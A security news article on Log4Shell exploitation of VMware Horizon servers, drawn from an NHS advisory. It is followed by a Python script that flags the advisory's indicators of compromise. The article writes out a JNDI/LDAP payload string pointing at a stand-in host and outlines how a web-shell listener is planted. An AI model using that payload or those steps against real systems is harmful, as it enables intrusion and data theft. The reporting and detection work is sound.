VMware Horizon servers targeted through Log4Shell exploitation, according to UK NHS

VMware Horizon was reportedly found vulnerable to the underlying Log4Shell vulnerabilities, which unknown threat actors are exploiting to deploy web shells

08-Jan-2022

The UK National Health Service (NHS) was reportedly found compromised after the Log4Shell vulnerability was detected on its VMware Horizon servers, where unidentified threat actors are actively exploiting it to install web shells for deployment across public-facing infrastructure.

The security team at UK NHS has recently released a security advisory highlighting that "Threat actors are targeting VMware Horizon servers running on Apache Log4j 2.14, in establishing persistence within affected networks. While threat actors are aiming to leverage web shell in order to execute multiple malicious activities such as deploying additional malicious software, data exfiltration, or deployment of ransomware."

VMware products are targeted through Log4Shell for the second time, following instances of the Conti ransomware group exploiting the flaw to compromise VMware vCenter servers. Tracked as CVE-2021-44228, the infamous Log4Shell vulnerability is a critical remote code execution flaw detected in the Apache Log4j 2.14 Java-based logging library, and it has been under heavy exploitation since December 2021. It was first disclosed with a proof of concept by p0rz9, a Chinese web security engineer.

"The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure. As soon as a loophole has been identified, threat actors use the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file injecting a web shell into the VM Blast Secure Gateway service."

### Apache Tomcat: the main target via VMware Horizon servers

Apache Tomcat, which is embedded within VMware Horizon and is itself vulnerable to Log4Shell, was the threat actors' primary target.


As the first step of exploitation, threat actors send a "${jndi:ldap://example.com}" payload and spawn a PowerShell command from Tomcat. That command queries the Win32 service list to obtain the VMBlastSG service names, retrieves their paths, modifies 'absg-worker.js' to drop a listener, and restarts the service to activate the implant. The listener then executes arbitrary commands received via HTTP/HTTPS as header objects carrying a hardcoded string that the listener recognises.

If successful, this establishes continuous and stable communication with the C2 server and allows data exfiltration, command execution, or the deployment of ransomware.


### Available Security Patches for VMware Products

VMware Horizon, along with other VMware products, already received a security update last month patching CVE-2021-45046 and CVE-2021-44228 in versions 2111, 7.13.1, and 7.10.3. Lately, however, VMware Horizon admins have been strictly advised to update their systems with all the respective security patches.

As such, all VMware Horizon admins are urged to apply the security updates as soon as possible.

The UK NHS has highlighted three key indicators in its report as signs of confirmed exploitation on vulnerable systems:

- Evidence of ws_TomcatService.exe spawning abnormal processes.
- Any powershell.exe process containing VMBlastSG in its command line.
- File modifications to '…\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js'. This file is generally overwritten during upgrades and is not otherwise modified.
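Detection logic for the three NHS indicators above, as an added example that is not from the article or from the NHS report. It runs over constructed process-creation and file-modification events; the event field names, the set of suspicious child processes and the `during_upgrade` flag are assumptions of this example, not anything the report specifies.

```python
import re

# Path tail of the file the NHS report names (its prefix is elided in the report, so match the tail)
ABSG_WORKER_RE = re.compile(r"\\VMware View\\Server\\appblastgateway\\lib\\absg-worker\.js$", re.I)
# Children a Tomcat service process is not expected to spawn (assumption: tune to your environment)
SUSPICIOUS_CHILDREN = {"powershell.exe", "cmd.exe", "certutil.exe", "rundll32.exe"}

def _basename(path):
    """Last path component, lower-cased, so image names compare case-insensitively."""
    return path.rsplit("\\", 1)[-1].lower()

def check_event(ev):
    """Return the names of the NHS indicators matched by one normalised event (empty list if none)."""
    hits = []
    if ev.get("kind") == "process":
        parent, image = _basename(ev.get("parent_image", "")), _basename(ev.get("image", ""))
        # Indicator 1: ws_TomcatService.exe spawning an abnormal child process
        if parent == "ws_tomcatservice.exe" and image in SUSPICIOUS_CHILDREN:
            hits.append("tomcat_abnormal_child")
        # Indicator 2: any powershell.exe whose command line mentions VMBlastSG
        if image == "powershell.exe" and "vmblastsg" in ev.get("command_line", "").lower():
            hits.append("powershell_vmblastsg")
    elif ev.get("kind") == "file_modify":
        # Indicator 3: absg-worker.js modified outside of a product upgrade window
        if ABSG_WORKER_RE.search(ev.get("path", "")) and not ev.get("during_upgrade", False):
            hits.append("absg_worker_modified")
    return hits

def scan(events):
    """(event id, matched indicators) for every event that trips at least one indicator."""
    return [(ev["id"], hits) for ev in events if (hits := check_event(ev))]

# Constructed sample telemetry (not real events); field names are an assumption of this example
HORIZON_BIN = r"C:\Program Files\VMware\VMware View\Server\bin"
ABSG_PATH = r"C:\Program Files\VMware\VMware View\Server\appblastgateway\lib\absg-worker.js"
SAMPLE_EVENTS = [
    {"id": 1, "kind": "process", "parent_image": HORIZON_BIN + r"\ws_TomcatService.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -NoProfile -Command "Get-Service -Name VMBlastSG*"'},
    {"id": 2, "kind": "process", "parent_image": r"C:\Windows\System32\services.exe",
     "image": HORIZON_BIN + r"\ws_TomcatService.exe", "command_line": "ws_TomcatService.exe"},
    {"id": 3, "kind": "file_modify", "path": ABSG_PATH, "during_upgrade": False},
    {"id": 4, "kind": "file_modify", "path": ABSG_PATH, "during_upgrade": True},
]

if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {', '.join(hits)}")
```

Event 1 trips the first two indicators at once because the PowerShell child of Tomcat also names VMBlastSG; event 4 is suppressed only because it is flagged as an upgrade-time write, which is the one legitimate reason the report gives for that file changing.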